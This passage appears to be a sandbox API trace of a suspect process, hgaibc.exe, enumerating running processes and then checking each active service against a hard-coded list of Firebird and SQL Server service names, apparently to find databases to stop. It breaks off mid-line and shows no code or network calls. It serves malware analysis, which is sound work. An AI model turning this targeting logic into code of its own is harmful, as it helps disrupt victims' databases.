th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.699] lstrlenW (lpString="svchost.exe") returned 11 [0197.699] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.700] lstrlenW (lpString="svchost.exe") returned 11 [0197.700] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.700] lstrlenW (lpString="svchost.exe") returned 11 [0197.701] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.701] lstrlenW (lpString="svchost.exe") returned 11 [0197.701] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0197.702] lstrlenW (lpString="spoolsv.exe") returned 11 [0197.702] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.703] lstrlenW (lpString="svchost.exe") returned 11 [0197.703] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0197.704] lstrlenW (lpString="audiodg.exe") returned 11 [0197.704] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0197.704] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0197.705] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0197.705] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0197.705] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0197.706] lstrlenW (lpString="Memory Compression") returned 18 [0197.706] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0197.707] lstrlenW (lpString="sihost.exe") returned 10 [0197.707] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.708] lstrlenW (lpString="svchost.exe") returned 11 [0197.708] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0197.709] lstrlenW (lpString="msoia.exe") returned 9 [0197.709] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0197.709] lstrlenW (lpString="taskhostw.exe") returned 13 [0197.709] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.710] lstrlenW (lpString="explorer.exe") returned 12 [0197.710] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0197.711] lstrlenW (lpString="SearchUI.exe") returned 12 [0197.711] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0197.712] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0197.712] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0197.713] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0197.713] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.713] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0197.713] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0197.714] lstrlenW (lpString="hgaibc.exe") returned 10 [0197.714] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0197.715] CloseHandle (hObject=0x380) returned 1 [0197.715] Sleep (dwMilliseconds=0x1f4) [0198.639] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bef98 [0198.640] EnumServicesStatusExW (in: hSCManager=0x6bef98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0198.640] GetLastError () returned 0xea [0198.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d97a8 [0198.640] EnumServicesStatusExW (in: hSCManager=0x6bef98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d97a8, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d97a8, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0198.641] CloseServiceHandle (hSCObject=0x6bef98) returned 1 [0198.641] lstrlenW (lpString="Appinfo") returned 7 [0198.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0198.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0198.641] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0198.641] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0198.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0198.641] lstrlenW (lpString="AppXSvc") returned 7 [0198.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0198.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0198.641] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0198.642] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0198.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0198.642] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0198.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0198.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0198.642] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0198.642] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0198.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0198.642] lstrlenW (lpString="Audiosrv") returned 8 [0198.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0198.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0198.642] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0198.642] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0198.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0198.642] lstrlenW (lpString="BFE") returned 3 [0198.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0198.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0198.642] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0198.642] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0198.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0198.642] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0198.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0198.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0198.642] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0198.642] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0198.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0198.642] lstrlenW (lpString="CDPSvc") returned 6 [0198.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0198.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0198.642] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0198.642] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0198.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0198.642] lstrlenW (lpString="ClickToRunSvc") returned 13 [0198.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0198.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0198.642] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0198.642] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0198.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0198.643] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0198.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0198.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0198.643] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0198.643] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0198.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0198.643] lstrlenW (lpString="CryptSvc") returned 8 [0198.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0198.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0198.643] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0198.643] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0198.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0198.643] lstrlenW (lpString="DcomLaunch") returned 10 [0198.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0198.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0198.643] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0198.643] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0198.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0198.643] lstrlenW (lpString="DeviceAssociationService") returned 24 [0198.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0198.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0198.643] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0198.643] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0198.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0198.643] lstrlenW (lpString="Dhcp") returned 4 [0198.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0198.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0198.643] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0198.643] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0198.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0198.643] lstrlenW (lpString="Dnscache") returned 8 [0198.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0198.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0198.643] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0198.643] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0198.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0198.643] lstrlenW (lpString="DPS") returned 3 [0198.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0198.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0198.644] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0198.644] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0198.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0198.644] lstrlenW (lpString="DusmSvc") returned 7 [0198.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0198.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0198.644] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0198.644] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0198.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0198.644] lstrlenW (lpString="EventLog") returned 8 [0198.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0198.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0198.644] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0198.644] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0198.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0198.644] lstrlenW (lpString="EventSystem") returned 11 [0198.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0198.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0198.644] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0198.644] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0198.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0198.644] lstrlenW (lpString="FontCache") returned 9 [0198.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0198.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0198.644] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0198.644] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0198.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0198.644] lstrlenW (lpString="gpsvc") returned 5 [0198.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0198.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0198.644] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0198.644] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0198.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0198.644] lstrlenW (lpString="iphlpsvc") returned 8 [0198.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0198.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0198.645] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0198.645] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0198.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0198.645] lstrlenW (lpString="KeyIso") returned 6 [0198.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0198.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0198.645] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0198.645] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0198.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0198.645] lstrlenW (lpString="LanmanServer") returned 12 [0198.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0198.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0198.645] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0198.645] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0198.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0198.645] lstrlenW (lpString="LanmanWorkstation") returned 17 [0198.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0198.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0198.645] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0198.645] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0198.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0198.645] lstrlenW (lpString="lfsvc") returned 5 [0198.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0198.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0198.645] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0198.645] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0198.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0198.645] lstrlenW (lpString="lmhosts") returned 7 [0198.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0198.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0198.645] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0198.645] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0198.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0198.645] lstrlenW (lpString="LSM") returned 3 [0198.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0198.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0198.645] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0198.645] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0198.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0198.646] lstrlenW (lpString="MpsSvc") returned 6 [0198.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0198.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0198.646] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0198.646] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0198.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0198.646] lstrlenW (lpString="NcbService") returned 10 [0198.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0198.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0198.646] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0198.646] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0198.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0198.646] lstrlenW (lpString="netprofm") returned 8 [0198.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0198.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0198.646] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0198.646] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0198.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0198.646] lstrlenW (lpString="NgcSvc") returned 6 [0198.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0198.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0198.646] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0198.646] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0198.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0198.646] lstrlenW (lpString="NlaSvc") returned 6 [0198.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0198.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0198.646] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0198.646] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0198.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0198.646] lstrlenW (lpString="nsi") returned 3 [0198.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0198.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0198.646] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0198.646] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0198.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0198.646] lstrlenW (lpString="PcaSvc") returned 6 [0198.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0198.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0198.647] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0198.647] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0198.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0198.647] lstrlenW (lpString="PlugPlay") returned 8 [0198.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0198.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0198.647] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0198.647] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0198.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0198.647] lstrlenW (lpString="Power") returned 5 [0198.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0198.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0198.647] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0198.647] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0198.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0198.647] lstrlenW (lpString="ProfSvc") returned 7 [0198.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0198.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0198.647] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0198.647] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0198.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0198.647] lstrlenW (lpString="RpcEptMapper") returned 12 [0198.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", 